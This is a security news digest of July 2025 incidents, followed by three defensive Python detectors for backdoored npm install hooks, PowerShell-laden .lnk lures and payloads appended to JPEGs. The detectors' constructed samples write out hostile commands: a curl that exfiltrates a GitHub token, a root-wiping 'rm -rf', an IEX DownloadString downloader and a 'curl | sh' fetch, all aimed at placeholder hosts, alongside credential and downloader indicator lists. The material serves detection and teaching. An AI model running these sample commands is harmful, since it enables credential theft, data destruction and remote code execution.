Daily Brief
Find articles below; see 'DETAILS' for the generated summaries
Total articles found: 11799
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-07-26 13:17:05 | theregister | MISCELLANEOUS | Legislation Proposed to Ban AI in Pricing Based on Personal Data | Two Democratic members of Congress have introduced a bill to ban the use of AI surveillance in setting prices and wages. Delta Air Lines has begun using AI for dynamic pricing on about 3% of its domestic fares and plans to expand that to 20% by year-end. The bill, the Stop AI Price Gouging and Wage Fixing Act, aims to protect consumers from AI-driven price manipulation based on personal data. The Federal Trade Commission (FTC) has documented "surveillance pricing," in which prices are adjusted according to consumer data such as location, device type, and shopping habits. The bill would be enforced by the FTC, the Equal Employment Opportunity Commission, and the states, and would allow private suits against violating companies. Despite broad concern about the practice, the bill faces a difficult path through a Republican-controlled Congress. | Details |
| 2025-07-26 11:35:22 | theregister | NATION STATE ACTIVITY | SharePoint Vulnerabilities Exploited by Nation State Actors and Others | Microsoft's July fixes for two SharePoint Server bugs turned out to be incomplete, and attackers bypassed them to exploit on-premises servers. Researchers suspect a leak, possibly from the Microsoft Active Protections Program (MAPP), which shares vulnerability details with security vendors ahead of Patch Tuesday, helped attackers bypass the new patches. Some exploitation was observed before the patches were publicly released, raising the question of where the attackers' knowledge came from. The attackers included Chinese government-backed groups and ransomware gangs. Eye Security detected large-scale exploitation shortly after Microsoft published the flawed patches. More than 400 organizations were compromised through flaws the patches had not fully closed. Microsoft did not disclose specifics about the suspected leak but said it would review and improve its processes. Another possibility is that attackers found the bypasses independently rather than through a leak. | Details |
| 2025-07-25 20:46:48 | bleepingcomputer | CYBERCRIME | Hacker Injects Harmless Wiper Code into Amazon AI Tool | A hacker using the handle 'lkmanka58' planted non-destructive data-wiping code in Amazon Q, Amazon's generative AI coding extension for Visual Studio Code. The code was intended as a warning about the security of AI coding assistants rather than to cause damage; it carried data-wiping instructions for the assistant but was non-destructive. The hacker got the code in through a pull request to Amazon's public GitHub repository for the extension, apparently taking advantage of a misconfigured contribution workflow. Amazon unknowingly published the compromised version (1.84.0) to the Visual Studio Code marketplace, where the extension has close to a million installs. Security researchers alerted Amazon on July 23; Amazon confirmed the issue and released a patched version (1.85.0) the following day. AWS said the defective code was non-operational in user environments, although there were unconfirmed reports of it executing without causing harm. Users should update the Amazon Q extension to version 1.85.0 promptly to remove the compromised build. The incident shows the need for strict controls on contributions to public repositories that feed release pipelines. | Details |
| 2025-07-25 19:59:21 | theregister | NATION STATE ACTIVITY | Senator Demands Google Reveal Salt Typhoon Security Reports | Senator Maria Cantwell has asked Google-owned Mandiant to hand over the security assessments it produced on the Salt Typhoon breaches at AT&T and Verizon. Both carriers have refused to give Congress those documents, raising doubts about the veracity of their claims that their networks are secure. The breach, attributed to Chinese state operatives, gave the intruders substantial and possibly long-standing access to U.S. telecom networks. AT&T and Verizon have maintained that their networks are secure despite the significant breaches confirmed by U.S. intelligence. Cantwell's demand comes amid broader investigations into Chinese espionage against U.S. IT infrastructure. Recorded Future and SecurityScorecard have reported ongoing Chinese campaigns against global telecom providers and U.S. universities. The Cyber Safety Review Board, which had been investigating the Salt Typhoon intrusions, was dissolved under the Trump administration before finishing its work. | Details |
| 2025-07-25 15:10:17 | thehackernews | NATION STATE ACTIVITY | U.S. Sanctions Target North Korean IT Worker Fraud Scheme | The U.S. Department of the Treasury has sanctioned Korea Sobaeksu Trading Company and three individuals for supporting North Korea's illicit IT worker scheme. The scheme infiltrates global supply chains and evades international sanctions through fraud and identity theft. North Korean IT workers dispatched abroad use false documents and stolen identities to obtain remote jobs, both to generate revenue and to gain access to sensitive data. Some of these workers have reportedly introduced malware into employer networks and exfiltrated proprietary data. The earnings are funneled back to the DPRK to fund its nuclear weapons and ballistic missile programs. Christina Marie Chapman was sentenced for her part in the scheme: she ran a laptop farm that let the North Korean workers pose as U.S.-based employees in an operation that generated more than $17 million. The FBI seized more than 90 laptops in a search of Chapman's residence, illustrating the scale of the fraudulent network. | Details |
| 2025-07-25 14:31:37 | theregister | MALWARE | Toptal's GitHub Account Breached, Malware Distributed to Developers | Toptal's GitHub organization was compromised, and malware was pushed out through its Picasso developer toolbox. Roughly 5,000 downloads of the tampered packages occurred; the malicious code stole GitHub authentication tokens and set up backdoors on developer machines. Security firm Socket found the malware in 10 of the 73 public repositories it analyzed; it gave the attackers persistent access and the ability to pull down further malware. Socket advised affected users to inspect package.json files for malicious lifecycle scripts, rotate any GitHub tokens that may have been exposed, and scan their systems for malicious activity. Toptal removed the infected packages and restored the repositories to their last clean versions. Socket asked Toptal for details of the breach timeline and the intrusion method but received no response. The compromise fits a broader wave of npm supply-chain attacks that includes phishing of maintainers and abuse of AI coding tools. | Details |
| 2025-07-25 14:24:31 | thehackernews | NATION STATE ACTIVITY | Patchwork Spear-Phishing Campaign Targets Turkish Defense Sector | Patchwork, a state-sponsored threat actor attributed to India, ran a spear-phishing campaign against Turkish defense firms to collect strategic intelligence. The lures were malicious LNK files posing as invitations to a conference on unmanned vehicle systems. Targets included manufacturers of precision-guided missile systems; the campaign is read against geopolitical tensions among Pakistan, Türkiye, and India. Infection is multi-stage: the shortcut runs PowerShell commands that download further malware while a decoy PDF is shown to the victim. Compromised systems were made to send extensive reconnaissance data, including screenshots, back to a Patchwork-operated server. The actor's tooling has changed, moving from x64 DLL payloads to x86 PE executables. Patchwork's activity is seen in the context of Türkiye's growing defense collaborations and regional tensions. | Details |
| 2025-07-25 14:01:47 | bleepingcomputer | MISCELLANEOUS | How Cybersecurity PMs Adapt Products in Response to Threats | Cybersecurity has moved from fending off viruses to countering a sophisticated, financially motivated cybercrime industry. Product managers (PMs) now face smarter, more damaging attacks that keep exploiting the same weaknesses: stolen credentials and unpatched systems. Security PMs must steer product development toward real-time risk reduction through layered defenses and adjustments driven by incidents. ThreatLocker's "100 days to secure your environment" webinar series shows how lessons from breaches feed directly into product features and policy updates. Beyond issuing advisories, PMs are central to turning real-world feedback into safer, more resilient products. Continuous education and innovation are essential, with tools such as ThreatLocker Patch Management cited as helping PMs keep pace with evolving threats. Staying proactive and responsive helps PMs limit risk while keeping operational workflows efficient. | Details |
| 2025-07-25 13:20:53 | thehackernews | NATION STATE ACTIVITY | Cyber Espionage Strikes Russian Aerospace with EAGLET Backdoor | A cyber-espionage campaign is targeting Russia's aerospace and defense industry with a backdoor called EAGLET. The campaign, tracked as Operation CargoTalon and attributed to Unknown Group 901, targets employees of the Voronezh Aircraft Production Association with spear-phishing emails. The cargo-themed emails carry a ZIP archive containing a malicious Windows shortcut file. The shortcut uses PowerShell to deploy the EAGLET DLL while displaying a decoy document that references sanctioned Russian logistics entities. EAGLET gathers system information and connects to a remote server for command execution, but the follow-on payloads are unknown because the C2 server is offline. Source code and tactical overlaps were found with other campaigns against the Russian military, including those of the Head Mare group. Separately, the Russia-linked group UAC-0184 is targeting Ukraine with simpler attack chains that deploy the Remcos RAT. | Details |
| 2025-07-25 13:06:27 | theregister | DATA BREACH | Microsoft Can't Assure Data Sovereignty Under U.S. Law | Microsoft executives testifying under oath before the French Senate acknowledged that they cannot guarantee the sovereignty of EU customers' data if the U.S. government demands access under the CLOUD Act. The CLOUD Act lets U.S. authorities compel U.S.-based technology companies to hand over data regardless of whether it is stored domestically or on servers abroad. Despite contractual commitments to resist unfounded requests, Microsoft concedes it must comply with U.S. law, which could mean disclosing European data without the consent of local governments. Microsoft has historically pushed back on such requests and says it has scrutinized and challenged the validity of U.S. government data demands since the Obama administration. AWS and Google, like Microsoft, backed the CLOUD Act when it was enacted, calling it necessary for modern digital law enforcement despite criticism from civil-liberties groups. European cloud providers treat this as a sovereignty problem and are pushing the EU toward independent cloud offerings that reduce dependence on U.S. providers. AWS added that the CLOUD Act does not grant unrestricted access to data and that requests require judicial oversight. | Details |
| 2025-07-25 12:43:18 | bleepingcomputer | NATION STATE ACTIVITY | U.S. Sanctions North Korean Entities Over Fraudulent IT Worker Schemes | The U.S. Treasury has sanctioned Korea Sobaeksu Trading Company and three North Korean nationals for supporting fraudulent IT worker schemes. In these schemes, North Korean tech workers obtain jobs at American companies using fake or stolen identities. The proceeds are funneled back to North Korea to fund its nuclear and missile programs. Recent enforcement actions include the disruption of "laptop farm" operations and indictments of key individuals. OFAC has also sanctioned Song Kum Hyok, linked to the North Korean hacking group Andariel, for his role in the IT worker schemes. The sanctions freeze the designees' U.S. assets and bar U.S. persons from transacting with them, increasing pressure on the DPRK. The U.S. State Department is offering rewards of up to $7 million for information leading to the arrest of the sanctioned individuals. The actions are part of a sustained U.S. effort to cut off financing for North Korea's weapons programs. | Details |
| 2025-07-25 11:44:21 | bleepingcomputer | NATION STATE ACTIVITY | Arizona Woman Sentenced for Assisting North Korean Hackers | Christina Marie Chapman, 50, of Arizona, has been sentenced to 102 months in prison for helping North Korean IT workers infiltrate 309 U.S. companies. The DOJ charged Chapman alongside Ukrainian national Oleksandr Didenko and three others known only by aliases with multiple conspiracy and fraud counts. Chapman ran a "laptop farm" at her home, hosting company-issued laptops so that North Korean operatives could work remotely while appearing to be located in the U.S. Working under false identities, the North Koreans were placed at several Fortune 500 companies and other major U.S. businesses and earned more than $17 million. The FBI seized more than 90 laptops from Chapman's residence, and the Treasury has sanctioned additional entities tied to the scheme. Related recent measures include OFAC sanctions on a North Korean front company and associated individuals, and updated FBI guidance on hiring remote workers. | Details |
| 2025-07-25 10:39:45 | thehackernews | MALWARE | Cryptomining Malware Targets Cloud Systems via Cross-Platform Attacks | Cloud security firms Wiz and Aqua have uncovered two malware clusters, Soco404 and Koske, that exploit exposed cloud services to mine cryptocurrency. Soco404 targets both Linux and Windows hosts and hides its cryptominer payloads in fake 404 HTML pages hosted on Google Sites. The campaign has exploited Apache Tomcat, Atlassian Confluence servers, and publicly exposed PostgreSQL databases to spread. It uses native Linux and Windows tools to download and execute payloads, aiming to compromise as many systems as possible for financial gain. On Windows the malware attempts to halt event logging and deletes itself after execution to evade detection. Koske, which analysts suspect was written with help from a large language model, hides its payloads inside JPEG images and gains entry through misconfigured JupyterLab servers. Both campaigns aim to use the computational resources of compromised systems to mine various cryptocurrencies, with an emphasis on stealth and persistence. | Details |
| 2025-07-25 10:26:08 | thehackernews | DATA BREACH | Risks and Impacts of Unauthorized Chinese GenAI Tool Usage | A study by Harmonic Security found widespread unapproved use of Chinese GenAI tools among U.S. and UK employees. Analysis of 14,000 employees showed that 8% used China-based AI tools such as DeepSeek and Baidu Chat, raising data security concerns. More than 17 megabytes of sensitive data, including source code and M&A documents, was uploaded to these platforms in a single month. The tools' data-handling and privacy policies are questionable, so such uploads may breach compliance requirements. DeepSeek was the most used platform, accounting for 85% of the incidents in which sensitive data was exposed. Harmonic Security's monitoring product offers real-time tracking of AI usage and policy enforcement to reduce the risk. The study points to a governance gap in companies with large developer populations, where policy often lags behind tool adoption. | Details |
| 2025-07-25 10:18:38 | theregister | DATA BREACH | Qdos Confirms Data Security Incident Compromising Client Data | Qdos, a business insurance and employment status specialist, has confirmed a data breach affecting customers' personal data. The breach stemmed from unauthorized access to the mygoqdos.com web application. After detecting the intrusion on June 19, Qdos engaged third-party cybersecurity experts to investigate. The incident did not involve ransomware, but personal customer information and documents relating to insurance and IR35 services may have been accessed. Financial data and sensitive identity documents such as passports and driver's licenses were not compromised. Qdos says clients' insurance policies are unaffected and that online account management for renewals and applications remains secure. Qdos has notified the ICO, FCA, Action Fraud, and NCSC and is offering affected users free identity monitoring through Experian. | Details |
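The Toptal item above carries Socket's advice to check package.json files for malicious scripts. The following is an added example of that check, not Socket's or Toptal's code: it reads the lifecycle hooks npm runs automatically during an install and flags commands that read a credential, ship data off-host, pipe a download into an interpreter, or wipe the filesystem. The indicator patterns are generic heuristics rather than the exact commands from the incident, and the sample package.json (including its example.invalid URL) is constructed for the demonstration.

```python
"""Flag risky npm lifecycle scripts in a package.json.

Added example, not Socket's or Toptal's tooling.  The indicator patterns are
generic heuristics for what a backdoored install hook usually does (read a
credential, ship it somewhere, run or drop something), not the exact commands
from the incident.  The sample package.json is constructed.
"""
from __future__ import annotations
import json
import re

# Hooks npm runs on its own during `npm install`; a backdoor lives here.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# (pattern, reason) pairs, checked in this order against each hook's command.
INDICATORS = [
    (re.compile(r"\bgh\s+auth\s+token\b"), "reads the GitHub CLI auth token"),
    (re.compile(r"\b(GITHUB_TOKEN|GH_TOKEN|NPM_TOKEN|AWS_SECRET_ACCESS_KEY)\b"), "references a credential variable"),
    (re.compile(r"\b(curl|wget)\b.*?(\s-d\s|--data\b|\s-F\s|--upload-file\b)"), "sends data to a remote host"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|node)\b"), "pipes a download into an interpreter"),
    (re.compile(r"\brm\s+-[a-zA-Z]*[rR][a-zA-Z]*\s.*\s/(\s|$)"), "recursive delete of /"),
    (re.compile(r"--no-preserve-root\b"), "uses --no-preserve-root"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b"), "decodes or evals embedded content"),
]


def suspicious_scripts(package_json_text: str) -> list[tuple[str, str]]:
    """Return (hook, reason) for every lifecycle script that trips an indicator."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for pattern, reason in INDICATORS:
            if pattern.search(cmd):
                findings.append((hook, reason))
    return findings


def scan_file(path: str) -> list[tuple[str, str]]:
    """Same check for a package.json on disk."""
    with open(path, encoding="utf-8") as fh:
        return suspicious_scripts(fh.read())


# Constructed sample modelled on the shape of a backdoored package: the install
# hooks steal a token and then try to destroy the host; "build" is an ordinary script.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-ui-kit",
    "version": "3.2.1",
    "scripts": {
        "build": "tsc -p .",
        "preinstall": "curl -s -d \"$(gh auth token)\" https://example.invalid/collect",
        "postinstall": "rm -rf --no-preserve-root / > /dev/null 2>&1 || true",
    },
})

if __name__ == "__main__":
    for hook, reason in suspicious_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {reason}")
```

Run it against every package.json under node_modules after a suspect install, not just the top-level one; the hooks of transitive dependencies run with the same privileges. A hit on any install hook is a reason to rotate the tokens that were present in that environment, which is the second half of Socket's advice.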
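Both the Patchwork item and the EAGLET item above describe the same lure: a Windows shortcut (.lnk) whose target is PowerShell with a downloader command line. The following is an added triage example, not code from either report: it parses the Shell Link binary layout (fixed header, optional target ID list, optional LinkInfo, then the string fields in their fixed order) to pull out the relative path and command-line arguments, and then lists the PowerShell tokens that mark the shortcut as a downloader. The sample shortcut is constructed by the block's own `build_lnk` helper and its URL is a placeholder; the indicator list is a general one and is not tied to either campaign.

```python
"""Extract the command line a Windows .lnk shortcut will run and triage it.

Added example, not from either report.  Follows the ShellLink layout
(MS-SHLLINK): 76-byte header, optional LinkTargetIDList, optional LinkInfo,
then StringData fields in fixed order.  The sample shortcut is constructed.
"""
from __future__ import annotations
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# Tokens that mark a shortcut as a PowerShell downloader/dropper (general list).
POWERSHELL_INDICATORS = re.compile(
    r"-(enc|encodedcommand|e|w\s+hidden|windowstyle\s+hidden|nop|noprofile"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b"
    r"|\bpowershell(\.exe)?\b|\bpwsh(\.exe)?\b|IEX\b|Invoke-Expression"
    r"|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|FromBase64String",
    re.IGNORECASE,
)


def parse_lnk(data: bytes) -> dict[str, str]:
    """Return the StringData fields of a shortcut, keyed by field name."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:                       # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def powershell_indicators(fields: dict[str, str]) -> list[str]:
    """Sorted, lower-cased indicator tokens found in the target path and arguments."""
    cmd = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    return sorted({m.group(0).lower() for m in POWERSHELL_INDICATORS.finditer(cmd)})


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode shortcut; used here only to make a sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + b"\x00\x00\x00\x00"      # terminal ExtraData block


# Constructed sample: target is powershell.exe with a hidden-window downloader
# one-liner.  The URL is a placeholder, not one from either campaign.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/invite.ps1')\"",
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print(fields["relative_path"], fields["arguments"])
    print(powershell_indicators(fields))
```

The parser deliberately ignores the ID list and LinkInfo contents and reads only the string fields, which is where the command line lives; a full-featured tool would also walk the ExtraData blocks, since some lures stuff the real command into the environment or console blocks there.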
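The cryptomining item above says Koske disguises its payloads within JPEG images. One way that is done, and the one this added example assumes (it is not Aqua's or Wiz's detection code), is a polyglot: a genuine image that decodes normally, with the payload appended after the End Of Image marker where image viewers never look. The check below walks the JPEG's marker segments and scan data to find the real EOI, returns whatever follows it, and labels the trailer. The image bytes are constructed to be structurally walkable rather than a real photograph, and the appended script's URL is a placeholder.

```python
"""Find data appended after a JPEG's End Of Image marker.

Added example, not Aqua's or Wiz's detection code.  A JPEG is a sequence of
marker segments starting at SOI (FF D8) and ending at EOI (FF D9); a polyglot
that hides a script behind a real picture keeps the image intact and appends
its payload after EOI.  The sample image below is constructed.
"""
from __future__ import annotations

SOI, EOI = b"\xff\xd8", b"\xff\xd9"


def find_eoi(data: bytes) -> int:
    """Offset of the EOI marker, walking marker segments and the scan data."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                                  # EOI
            return pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:        # TEM, RSTn, SOI: no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")   # length includes itself
        if marker == 0xDA:                                  # SOS: entropy-coded data follows
            # Skip until a marker that is neither a stuffed FF00 nor a restart marker.
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] != 0x00 and not 0xD0 <= data[pos + 1] <= 0xD7
            ):
                pos += 1
    raise ValueError("no EOI marker found")


def jpeg_trailer(data: bytes) -> bytes:
    """Bytes after EOI; empty for a clean file."""
    return data[find_eoi(data) + 2:]


def classify_trailer(trailer: bytes) -> str:
    """Coarse label for the trailer: clean, script, elf, text or binary."""
    if not trailer:
        return "clean"
    if trailer.startswith(b"\x7fELF"):
        return "elf"
    if trailer.lstrip().startswith(b"#!"):
        return "script"
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in trailer)
    return "text" if printable / len(trailer) > 0.95 else "binary"


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed minimal JPEG: APP0, DQT, SOF0 (8x8 grayscale), SOS, a few bytes of
# scan data containing a stuffed FF00 and an RST0 marker, then EOI.
CLEAN_JPEG = (
    SOI
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xDB, b"\x00" + bytes(64))
    + _segment(0xC0, b"\x08\x00\x08\x00\x08\x01\x01\x11\x00")
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    + b"\xff\x00\x12\x34\xff\xd0\x56"
    + EOI
)
# The same image with a shell script glued on after EOI (placeholder URL).
POLYGLOT_JPEG = CLEAN_JPEG + b"#!/bin/sh\ncurl -s http://example.invalid/m.sh | sh\n"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_JPEG), ("polyglot", POLYGLOT_JPEG)):
        print(name, classify_trailer(jpeg_trailer(blob)))
```

Walking to the real EOI matters: a naive search for the last FF D9 in the file would be fooled by a trailer that happens to contain those two bytes, and a search for the first one can stop inside entropy-coded data. A non-empty trailer is not proof of malice on its own (some cameras and editors append metadata), so treat the label as a triage signal and inspect the bytes.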